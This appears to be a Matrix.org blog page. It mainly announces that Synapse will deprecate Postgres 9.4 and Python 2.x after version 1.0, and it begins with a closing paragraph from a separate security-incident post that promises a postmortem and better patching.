Once things are back up and running, we will retrospect on this incident in detail to identify the changes we need to make. We will provide a proper postmortem, including follow-up steps; meanwhile we are obviously going to take measures to improve the security of our production infrastructure, including patching services more aggressively and running more regular vulnerability scans.

Synapse: Deprecating Postgres 9.4 and Python 2.x

08.04.2019 00:00 — GeneralNeil Johnson

TL;DR DON'T PANIC - Synapse 1.0 will support Postgres 9.4 and Python 2.7

Folks, this is an update to explain that we will shortly be deprecating Synapse support for Postgres 9.4 and Python 2.x.

What are we doing?

From the dates described below, we will no longer guarantee support for deprecated versions. This means that Synapse may continue to work with these versions but we will not make any attempt to ensure compatibility and will remove old library versions from our CI.

When is this happening?

Synapse 1.0 will continue to support both technologies, but subsequent releases may not:

For Python, we shared that we would discontinue Python 2.x support from April 1st 2019, so from the first release that follows 1.0 we do not guarantee Python 2.x support.

For Postgres, we will give server admins 6 weeks to upgrade to a newer version, and will guarantee support until 20th May 2019.

Why would you do this to us?

We have multiple reasons, but broadly:

  • We want to make use of new language features not supported in old versions. This will enable us to continue to improve the performance and maintainability of Synapse.
  • Python 2.x will reach end of life at the end of the year. Postgres 9.4's final release will follow 2 months later, on 13th February 2020.
  • Since very few server admins still use these technologies in the wild, providing support is costly and we want to reduce our overall maintenance load.

La la la I am ignoring you - what will happen?

You will be able to upgrade to Synapse 1.0, but will likely experience incompatibilities that prevent you upgrading further. Seriously, you really need to upgrade.

Okay, but I have questions, where should I go?

Come and say Hi in #synapse:matrix.org and we'll do our best to help you.